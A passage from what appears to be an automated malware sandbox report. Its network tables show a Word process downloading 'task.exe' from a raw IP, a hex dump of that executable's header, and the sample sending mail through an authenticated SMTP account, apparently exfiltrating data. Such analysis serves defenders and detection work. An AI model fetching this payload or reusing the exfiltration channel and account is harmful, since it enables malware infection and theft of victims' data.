                                                                                                                      Nov 25, 2021 18:21:20.204117060 CET4916780192.168.2.22173.232.204.89
                                                                                                                      Nov 25, 2021 18:21:20.204621077 CET8049167173.232.204.89192.168.2.22
                                                                                                                      Nov 25, 2021 18:21:20.204688072 CET4916780192.168.2.22173.232.204.89
                                                                                                                      Nov 25, 2021 18:21:20.204765081 CET8049167173.232.204.89192.168.2.22
                                                                                                                      Nov 25, 2021 18:21:20.204803944 CET4916780192.168.2.22173.232.204.89
                                                                                                                      Nov 25, 2021 18:21:20.204915047 CET8049167173.232.204.89192.168.2.22
                                                                                                                      Nov 25, 2021 18:21:20.204960108 CET4916780192.168.2.22173.232.204.89
                                                                                                                      Nov 25, 2021 18:21:20.347692966 CET8049167173.232.204.89192.168.2.22
                                                                                                                      Nov 25, 2021 18:21:20.347734928 CET8049167173.232.204.89192.168.2.22
                                                                                                                      Nov 25, 2021 18:21:20.347927094 CET8049167173.232.204.89192.168.2.22
                                                                                                                      Nov 25, 2021 18:21:20.347969055 CET4916780192.168.2.22173.232.204.89
                                                                                                                      Nov 25, 2021 18:21:20.348006010 CET4916780192.168.2.22173.232.204.89
                                                                                                                      Nov 25, 2021 18:21:20.348021030 CET8049167173.232.204.89192.168.2.22
                                                                                                                      Nov 25, 2021 18:21:20.348077059 CET4916780192.168.2.22173.232.204.89
                                                                                                                      Nov 25, 2021 18:21:20.349200010 CET8049167173.232.204.89192.168.2.22
                                                                                                                      Nov 25, 2021 18:21:20.349323988 CET8049167173.232.204.89192.168.2.22
                                                                                                                      Nov 25, 2021 18:21:20.349323988 CET4916780192.168.2.22173.232.204.89
                                                                                                                      Nov 25, 2021 18:21:20.349373102 CET4916780192.168.2.22173.232.204.89
                                                                                                                      Nov 25, 2021 18:21:20.349503994 CET8049167173.232.204.89192.168.2.22
                                                                                                                      Nov 25, 2021 18:21:20.349555969 CET4916780192.168.2.22173.232.204.89
                                                                                                                      Nov 25, 2021 18:21:20.349795103 CET8049167173.232.204.89192.168.2.22
                                                                                                                      Nov 25, 2021 18:21:20.349869013 CET4916780192.168.2.22173.232.204.89
                                                                                                                      Nov 25, 2021 18:21:20.353435993 CET8049167173.232.204.89192.168.2.22
                                                                                                                      Nov 25, 2021 18:21:20.353483915 CET8049167173.232.204.89192.168.2.22
                                                                                                                      Nov 25, 2021 18:21:20.353502035 CET8049167173.232.204.89192.168.2.22
                                                                                                                      Nov 25, 2021 18:21:20.353527069 CET8049167173.232.204.89192.168.2.22
                                                                                                                      Nov 25, 2021 18:21:20.353630066 CET4916780192.168.2.22173.232.204.89
                                                                                                                      Nov 25, 2021 18:21:20.353773117 CET8049167173.232.204.89192.168.2.22
                                                                                                                      Nov 25, 2021 18:21:20.353796959 CET8049167173.232.204.89192.168.2.22
                                                                                                                      Nov 25, 2021 18:21:20.353821039 CET8049167173.232.204.89192.168.2.22
                                                                                                                      Nov 25, 2021 18:21:20.353836060 CET4916780192.168.2.22173.232.204.89
                                                                                                                      Nov 25, 2021 18:21:20.353852987 CET4916780192.168.2.22173.232.204.89
                                                                                                                      Nov 25, 2021 18:21:20.353857994 CET4916780192.168.2.22173.232.204.89
                                                                                                                      Nov 25, 2021 18:21:20.353930950 CET8049167173.232.204.89192.168.2.22
                                                                                                                      Nov 25, 2021 18:21:20.354039907 CET4916780192.168.2.22173.232.204.89
                                                                                                                      Nov 25, 2021 18:21:20.354151964 CET8049167173.232.204.89192.168.2.22
                                                                                                                      Nov 25, 2021 18:21:20.354195118 CET8049167173.232.204.89192.168.2.22
                                                                                                                      Nov 25, 2021 18:21:20.354274035 CET4916780192.168.2.22173.232.204.89
                                                                                                                      Nov 25, 2021 18:21:20.354276896 CET8049167173.232.204.89192.168.2.22
                                                                                                                      Nov 25, 2021 18:21:20.356125116 CET4916780192.168.2.22173.232.204.89
                                                                                                                      Nov 25, 2021 18:21:20.356142044 CET4916780192.168.2.22173.232.204.89
                                                                                                                      Nov 25, 2021 18:21:20.356143951 CET4916780192.168.2.22173.232.204.89
                                                                                                                      Nov 25, 2021 18:21:20.356184006 CET8049167173.232.204.89192.168.2.22
                                                                                                                      Nov 25, 2021 18:21:20.356214046 CET8049167173.232.204.89192.168.2.22
                                                                                                                      Nov 25, 2021 18:21:20.356224060 CET8049167173.232.204.89192.168.2.22
                                                                                                                      Nov 25, 2021 18:21:20.356236935 CET8049167173.232.204.89192.168.2.22
                                                                                                                      Nov 25, 2021 18:21:20.356254101 CET8049167173.232.204.89192.168.2.22
                                                                                                                      Nov 25, 2021 18:21:20.356271982 CET8049167173.232.204.89192.168.2.22
                                                                                                                      Nov 25, 2021 18:21:20.356283903 CET8049167173.232.204.89192.168.2.22
                                                                                                                      Nov 25, 2021 18:21:20.356302023 CET8049167173.232.204.89192.168.2.22
                                                                                                                      Nov 25, 2021 18:21:20.356319904 CET8049167173.232.204.89192.168.2.22
                                                                                                                      Nov 25, 2021 18:21:20.356337070 CET8049167173.232.204.89192.168.2.22
                                                                                                                      Nov 25, 2021 18:21:20.356353998 CET8049167173.232.204.89192.168.2.22
                                                                                                                      Nov 25, 2021 18:21:20.356374025 CET8049167173.232.204.89192.168.2.22
                                                                                                                      Nov 25, 2021 18:21:20.356395006 CET8049167173.232.204.89192.168.2.22

                                                                                                                      UDP Packets

                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                      Nov 25, 2021 18:22:16.367185116 CET5216753192.168.2.228.8.8.8
                                                                                                                      Nov 25, 2021 18:22:16.400242090 CET53521678.8.8.8192.168.2.22
                                                                                                                      Nov 25, 2021 18:22:26.332719088 CET5059153192.168.2.228.8.8.8
                                                                                                                      Nov 25, 2021 18:22:26.365432024 CET53505918.8.8.8192.168.2.22
                                                                                                                      Nov 25, 2021 18:22:38.933029890 CET5780553192.168.2.228.8.8.8
                                                                                                                      Nov 25, 2021 18:22:38.971023083 CET53578058.8.8.8192.168.2.22
                                                                                                                      Nov 25, 2021 18:23:06.768471956 CET5903053192.168.2.228.8.8.8
                                                                                                                      Nov 25, 2021 18:23:06.805955887 CET53590308.8.8.8192.168.2.22
                                                                                                                      Nov 25, 2021 18:23:16.268558025 CET5918553192.168.2.228.8.8.8
                                                                                                                      Nov 25, 2021 18:23:16.389869928 CET53591858.8.8.8192.168.2.22
                                                                                                                      Nov 25, 2021 18:23:16.390470982 CET5918553192.168.2.228.8.8.8
                                                                                                                      Nov 25, 2021 18:23:16.436175108 CET53591858.8.8.8192.168.2.22
                                                                                                                      Nov 25, 2021 18:23:21.923551083 CET5561653192.168.2.228.8.8.8
                                                                                                                      Nov 25, 2021 18:23:21.961463928 CET53556168.8.8.8192.168.2.22
                                                                                                                      Nov 25, 2021 18:23:21.962011099 CET5561653192.168.2.228.8.8.8
                                                                                                                      Nov 25, 2021 18:23:21.999506950 CET53556168.8.8.8192.168.2.22

                                                                                                                      DNS Queries

                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                      Nov 25, 2021 18:22:16.367185116 CET192.168.2.228.8.8.80x1beeStandard query (0)us2.smtp.mailhostbox.comA (IP address)IN (0x0001)
                                                                                                                      Nov 25, 2021 18:22:26.332719088 CET192.168.2.228.8.8.80x8af0Standard query (0)us2.smtp.mailhostbox.comA (IP address)IN (0x0001)
                                                                                                                      Nov 25, 2021 18:22:38.933029890 CET192.168.2.228.8.8.80xb28cStandard query (0)us2.smtp.mailhostbox.comA (IP address)IN (0x0001)
                                                                                                                      Nov 25, 2021 18:23:06.768471956 CET192.168.2.228.8.8.80x2596Standard query (0)us2.smtp.mailhostbox.comA (IP address)IN (0x0001)
                                                                                                                      Nov 25, 2021 18:23:16.268558025 CET192.168.2.228.8.8.80x1240Standard query (0)us2.smtp.mailhostbox.comA (IP address)IN (0x0001)
                                                                                                                      Nov 25, 2021 18:23:16.390470982 CET192.168.2.228.8.8.80x1240Standard query (0)us2.smtp.mailhostbox.comA (IP address)IN (0x0001)
                                                                                                                      Nov 25, 2021 18:23:21.923551083 CET192.168.2.228.8.8.80x6f32Standard query (0)us2.smtp.mailhostbox.comA (IP address)IN (0x0001)
                                                                                                                      Nov 25, 2021 18:23:21.962011099 CET192.168.2.228.8.8.80x6f32Standard query (0)us2.smtp.mailhostbox.comA (IP address)IN (0x0001)

                                                                                                                      DNS Answers

                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                      Nov 25, 2021 18:22:16.400242090 CET8.8.8.8192.168.2.220x1beeNo error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)
                                                                                                                      Nov 25, 2021 18:22:16.400242090 CET8.8.8.8192.168.2.220x1beeNo error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)
                                                                                                                      Nov 25, 2021 18:22:16.400242090 CET8.8.8.8192.168.2.220x1beeNo error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)
                                                                                                                      Nov 25, 2021 18:22:16.400242090 CET8.8.8.8192.168.2.220x1beeNo error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)
                                                                                                                      Nov 25, 2021 18:22:26.365432024 CET8.8.8.8192.168.2.220x8af0No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)
                                                                                                                      Nov 25, 2021 18:22:26.365432024 CET8.8.8.8192.168.2.220x8af0No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)
                                                                                                                      Nov 25, 2021 18:22:26.365432024 CET8.8.8.8192.168.2.220x8af0No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)
                                                                                                                      Nov 25, 2021 18:22:26.365432024 CET8.8.8.8192.168.2.220x8af0No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)
                                                                                                                      Nov 25, 2021 18:22:38.971023083 CET8.8.8.8192.168.2.220xb28cNo error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)
                                                                                                                      Nov 25, 2021 18:22:38.971023083 CET8.8.8.8192.168.2.220xb28cNo error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)
                                                                                                                      Nov 25, 2021 18:22:38.971023083 CET8.8.8.8192.168.2.220xb28cNo error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)
                                                                                                                      Nov 25, 2021 18:22:38.971023083 CET8.8.8.8192.168.2.220xb28cNo error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)
                                                                                                                      Nov 25, 2021 18:23:06.805955887 CET8.8.8.8192.168.2.220x2596No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)
                                                                                                                      Nov 25, 2021 18:23:06.805955887 CET8.8.8.8192.168.2.220x2596No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)
                                                                                                                      Nov 25, 2021 18:23:06.805955887 CET8.8.8.8192.168.2.220x2596No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)
                                                                                                                      Nov 25, 2021 18:23:06.805955887 CET8.8.8.8192.168.2.220x2596No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)
                                                                                                                      Nov 25, 2021 18:23:16.389869928 CET8.8.8.8192.168.2.220x1240No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)
                                                                                                                      Nov 25, 2021 18:23:16.389869928 CET8.8.8.8192.168.2.220x1240No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)
                                                                                                                      Nov 25, 2021 18:23:16.389869928 CET8.8.8.8192.168.2.220x1240No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)
                                                                                                                      Nov 25, 2021 18:23:16.389869928 CET8.8.8.8192.168.2.220x1240No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)
                                                                                                                      Nov 25, 2021 18:23:16.436175108 CET8.8.8.8192.168.2.220x1240No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)
                                                                                                                      Nov 25, 2021 18:23:16.436175108 CET8.8.8.8192.168.2.220x1240No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)
                                                                                                                      Nov 25, 2021 18:23:16.436175108 CET8.8.8.8192.168.2.220x1240No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)
                                                                                                                      Nov 25, 2021 18:23:16.436175108 CET8.8.8.8192.168.2.220x1240No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)
                                                                                                                      Nov 25, 2021 18:23:21.961463928 CET8.8.8.8192.168.2.220x6f32No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)
                                                                                                                      Nov 25, 2021 18:23:21.961463928 CET8.8.8.8192.168.2.220x6f32No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)
                                                                                                                      Nov 25, 2021 18:23:21.961463928 CET8.8.8.8192.168.2.220x6f32No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)
                                                                                                                      Nov 25, 2021 18:23:21.961463928 CET8.8.8.8192.168.2.220x6f32No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)
                                                                                                                      Nov 25, 2021 18:23:21.999506950 CET8.8.8.8192.168.2.220x6f32No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)
                                                                                                                      Nov 25, 2021 18:23:21.999506950 CET8.8.8.8192.168.2.220x6f32No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)
                                                                                                                      Nov 25, 2021 18:23:21.999506950 CET8.8.8.8192.168.2.220x6f32No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)
                                                                                                                      Nov 25, 2021 18:23:21.999506950 CET8.8.8.8192.168.2.220x6f32No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)

                                                                                                                      HTTP Request Dependency Graph

                                                                                                                      • 173.232.204.89

                                                                                                                      HTTP Packets

                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                      0192.168.2.2249167173.232.204.8980C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                      Nov 25, 2021 18:21:19.760103941 CET0OUTGET /task.exe HTTP/1.1
                                                                                                                      Accept: */*
                                                                                                                      UA-CPU: AMD64
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                      Host: 173.232.204.89
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Nov 25, 2021 18:21:19.907119036 CET1INHTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.19.9
                                                                                                                      Date: Thu, 25 Nov 2021 17:21:19 GMT
                                                                                                                      Content-Type: application/octet-stream
                                                                                                                      Content-Length: 504832
                                                                                                                      Last-Modified: Thu, 25 Nov 2021 10:52:42 GMT
                                                                                                                      Connection: keep-alive
                                                                                                                      ETag: "619f6afa-7b400"
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 fa 6a 9f 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 aa 07 00 00 08 00 00 00 00 00 00 ce c9 07 00 00 20 00 00 00 e0 07 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 08 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 7c c9 07 00 4f 00 00 00 00 e0 07 00 bc 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 e4 a9 07 00 00 20 00 00 00 aa 07 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 bc 05 00 00 00 e0 07 00 00 06 00 00 00 ac 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 08 00 00 02 00 00 00 b2 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 07 00 00 00 00 00 48 00 00 00 02 00 05 00 a8 65 00 00 b4 74 00 00 03 00 00 00 93 00 00 06 5c da 00 00 20 ef 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 7b 20 00 00 0a 2a 1e 02 7b 21 00 00 0a 2a 1e 02 7b 22 00 00 0a 2a 1e 02 7b 23 00 00 0a 2a 92 02 28 24 00 00 0a 02 03 7d 20 00 00 0a 02 04 7d 21 00 00 0a 02 05 7d 22 00 00 0a 02 0e 04 7d 23 00 00 0a 2a 00 00 00 13 30 03 00 73 00 00 00 01 00 00 11 03 75 01 00 00 1b 0a 02 06 2e 66 06 2c 60 28 25 00 00 0a 02 7b 20 00 00 0a 06 7b 20 00 00 0a 6f 26 00 00 0a 2c 48 28 27 00 00 0a 02 7b 21 00 00 0a 06 7b 21 00 00 0a 6f 28 00 00 0a 2c 30 28 29 00 00 0a 02 7b 22 00 00 0a 06 7b 22 00 00 0a 6f 2a 00 00 0a 2c 18 28 2b 00 00 0a 02 7b 23 00 00 0a 06 7b 23 00 00 0a 6f 2c 00 00 0a 2b 01 16 2b 01 17 2a 00 13 30 03 00 62 00 00 00 00 00 00 00 20 e4 ab 40 64 20 29 55 55 a5 5a 28 25 00 00 0a 02 7b 20 00 00 0a 6f 2d 00 00 0a 58 20 29 55 55 a5 5a 28 27 00 00 0a 02 7b 21 00 00 0a 6f 2e 00 00 0a 58 20 29 55 55 a5 5a 28 29 00 00 0a 02 7b 22 00 00 0a 6f 2f 00 00 0a 58 20 29 55 55 a5 5a 28 2b 00 00 0a 02 7b 23 00 00 0a 6f 30 00 00 0a 58 2a 00 00 13 30 07 00 b2 00 00 00 02 00 00 11 14 72 01 00 00 70 1a 8d 14 00 00 01 25 16 02 7b 20 00 00 0a 0a 12 00 25 71 06 00 00 1b 8c 06 00 00 1b 2d 04 26 14 2b 0b fe 16 06 00 00 1b 6f 31 00 00 0a a2 25 17 02 7b 21 00 00 0a 0b 12 01 25 71 07 00 00 1b 8c 07 00 00 1b 2d 04 26 14 2b 0b fe 16 07 00 00 1b 6f 31 00 00 0a a2 25 18 02 7b 22 00 00 0a 0c 12 02 25 71 08 00 00 1b 8c 08 00 00 1b 2d 04 26 14 2b 0b fe 16 08 00 00 1b 6f 31 00 00 0a a2 25 19 02 7b 23 00 00 0a 0d 12 03 25 71 09 00 00 1b 8c 09 00 00 1b 2d 04 26 14 2b 0b fe 16 09 00
                                                                                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELja0 @ @|O H.text `.rsrc@@.reloc@BHet\ { *{!*{"*{#*($} }!}"}#*0su.f,`(%{ { o&,H('{!{!o(,0(){"{"o*,(+{#{#o,++*0b @d )UUZ(%{ o-X )UUZ('{!o.X )UUZ(){"o/X )UUZ(+{#o0X*0rp%{ %q-&+o1%{!%q-&+o1%{"%q-&+o1%{#%q-&+


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                      1192.168.2.2249168173.232.204.8980C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                      Nov 25, 2021 18:21:28.364023924 CET533OUTGET /task.exe HTTP/1.1
                                                                                                                      Host: 173.232.204.89
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Nov 25, 2021 18:21:28.511565924 CET534INHTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.19.9
                                                                                                                      Date: Thu, 25 Nov 2021 17:21:28 GMT
                                                                                                                      Content-Type: application/octet-stream
                                                                                                                      Content-Length: 504832
                                                                                                                      Last-Modified: Thu, 25 Nov 2021 10:52:42 GMT
                                                                                                                      Connection: keep-alive
                                                                                                                      ETag: "619f6afa-7b400"
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 fa 6a 9f 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 aa 07 00 00 08 00 00 00 00 00 00 ce c9 07 00 00 20 00 00 00 e0 07 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 08 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 7c c9 07 00 4f 00 00 00 00 e0 07 00 bc 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 e4 a9 07 00 00 20 00 00 00 aa 07 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 bc 05 00 00 00 e0 07 00 00 06 00 00 00 ac 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 08 00 00 02 00 00 00 b2 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 07 00 00 00 00 00 48 00 00 00 02 00 05 00 a8 65 00 00 b4 74 00 00 03 00 00 00 93 00 00 06 5c da 00 00 20 ef 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 7b 20 00 00 0a 2a 1e 02 7b 21 00 00 0a 2a 1e 02 7b 22 00 00 0a 2a 1e 02 7b 23 00 00 0a 2a 92 02 28 24 00 00 0a 02 03 7d 20 00 00 0a 02 04 7d 21 00 00 0a 02 05 7d 22 00 00 0a 02 0e 04 7d 23 00 00 0a 2a 00 00 00 13 30 03 00 73 00 00 00 01 00 00 11 03 75 01 00 00 1b 0a 02 06 2e 66 06 2c 60 28 25 00 00 0a 02 7b 20 00 00 0a 06 7b 20 00 00 0a 6f 26 00 00 0a 2c 48 28 27 00 00 0a 02 7b 21 00 00 0a 06 7b 21 00 00 0a 6f 28 00 00 0a 2c 30 28 29 00 00 0a 02 7b 22 00 00 0a 06 7b 22 00 00 0a 6f 2a 00 00 0a 2c 18 28 2b 00 00 0a 02 7b 23 00 00 0a 06 7b 23 00 00 0a 6f 2c 00 00 0a 2b 01 16 2b 01 17 2a 00 13 30 03 00 62 00 00 00 00 00 00 00 20 e4 ab 40 64 20 29 55 55 a5 5a 28 25 00 00 0a 02 7b 20 00 00 0a 6f 2d 00 00 0a 58 20 29 55 55 a5 5a 28 27 00 00 0a 02 7b 21 00 00 0a 6f 2e 00 00 0a 58 20 29 55 55 a5 5a 28 29 00 00 0a 02 7b 22 00 00 0a 6f 2f 00 00 0a 58 20 29 55 55 a5 5a 28 2b 00 00 0a 02 7b 23 00 00 0a 6f 30 00 00 0a 58 2a 00 00 13 30 07 00 b2 00 00 00 02 00 00 11 14 72 01 00 00 70 1a 8d 14 00 00 01 25 16 02 7b 20 00 00 0a 0a 12 00 25 71 06 00 00 1b 8c 06 00 00 1b 2d 04 26 14 2b 0b fe 16 06 00 00 1b 6f 31 00 00 0a a2 25 17 02 7b 21 00 00 0a 0b 12 01 25 71 07 00 00 1b 8c 07 00 00 1b 2d 04 26 14 2b 0b fe 16 07 00 00 1b 6f 31 00 00 0a a2 25 18 02 7b 22 00 00 0a 0c 12 02 25 71 08 00 00 1b 8c 08 00 00 1b 2d 04 26 14 2b 0b fe 16 08 00 00 1b 6f 31 00 00 0a a2 25 19 02 7b 23 00 00 0a 0d 12 03 25 71 09 00 00 1b 8c 09 00 00 1b 2d 04 26 14 2b 0b fe 16 09 00
                                                                                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELja0 @ @|O H.text `.rsrc@@.reloc@BHet\ { *{!*{"*{#*($} }!}"}#*0su.f,`(%{ { o&,H('{!{!o(,0(){"{"o*,(+{#{#o,++*0b @d )UUZ(%{ o-X )UUZ('{!o.X )UUZ(){"o/X )UUZ(+{#o0X*0rp%{ %q-&+o1%{!%q-&+o1%{"%q-&+o1%{#%q-&+


                                                                                                                      SMTP Packets

                                                                                                                      TimestampSource PortDest PortSource IPDest IPCommands
                                                                                                                      Nov 25, 2021 18:21:56.953448057 CET58749173208.91.199.224192.168.2.22421 4.4.2 us2.outbound.mailhostbox.com Error: timeout exceeded
                                                                                                                      Nov 25, 2021 18:21:59.507791996 CET58749174208.91.198.143192.168.2.22421 4.4.2 us2.outbound.mailhostbox.com Error: timeout exceeded
                                                                                                                      Nov 25, 2021 18:22:16.768467903 CET58749169208.91.198.143192.168.2.22220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                                                                      Nov 25, 2021 18:22:16.769277096 CET49169587192.168.2.22208.91.198.143EHLO 841618
                                                                                                                      Nov 25, 2021 18:22:16.919429064 CET58749169208.91.198.143192.168.2.22250-us2.outbound.mailhostbox.com
                                                                                                                      250-PIPELINING
                                                                                                                      250-SIZE 41648128
                                                                                                                      250-VRFY
                                                                                                                      250-ETRN
                                                                                                                      250-STARTTLS
                                                                                                                      250-AUTH PLAIN LOGIN
                                                                                                                      250-AUTH=PLAIN LOGIN
                                                                                                                      250-ENHANCEDSTATUSCODES
                                                                                                                      250-8BITMIME
                                                                                                                      250 DSN
                                                                                                                      Nov 25, 2021 18:22:16.929383993 CET49169587192.168.2.22208.91.198.143AUTH login ZHViYWlAc2t5Y29tZXguY29t
                                                                                                                      Nov 25, 2021 18:22:17.080898046 CET58749169208.91.198.143192.168.2.22334 UGFzc3dvcmQ6
                                                                                                                      Nov 25, 2021 18:22:17.239337921 CET58749169208.91.198.143192.168.2.22235 2.7.0 Authentication successful
                                                                                                                      Nov 25, 2021 18:22:17.241938114 CET49169587192.168.2.22208.91.198.143MAIL FROM:<dubai@skycomex.com>
                                                                                                                      Nov 25, 2021 18:22:17.394002914 CET58749169208.91.198.143192.168.2.22250 2.1.0 Ok
                                                                                                                      Nov 25, 2021 18:22:17.396831989 CET49169587192.168.2.22208.91.198.143RCPT TO:<dubai@skycomex.com>
                                                                                                                      Nov 25, 2021 18:22:17.563546896 CET58749169208.91.198.143192.168.2.22250 2.1.5 Ok
                                                                                                                      Nov 25, 2021 18:22:17.565687895 CET49169587192.168.2.22208.91.198.143DATA
                                                                                                                      Nov 25, 2021 18:22:17.716183901 CET58749169208.91.198.143192.168.2.22354 End data with <CR><LF>.<CR><LF>
                                                                                                                      Nov 25, 2021 18:22:18.775433064 CET58749169208.91.198.143192.168.2.22250 2.0.0 Ok: queued as 75FD078216F
                                                                                                                      Nov 25, 2021 18:22:26.675386906 CET58749170208.91.198.143192.168.2.22220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                                                                      Nov 25, 2021 18:22:26.678370953 CET49170587192.168.2.22208.91.198.143EHLO 841618
                                                                                                                      Nov 25, 2021 18:22:26.830585957 CET58749170208.91.198.143192.168.2.22250-us2.outbound.mailhostbox.com
                                                                                                                      250-PIPELINING
                                                                                                                      250-SIZE 41648128
                                                                                                                      250-VRFY
                                                                                                                      250-ETRN
                                                                                                                      250-STARTTLS
                                                                                                                      250-AUTH PLAIN LOGIN
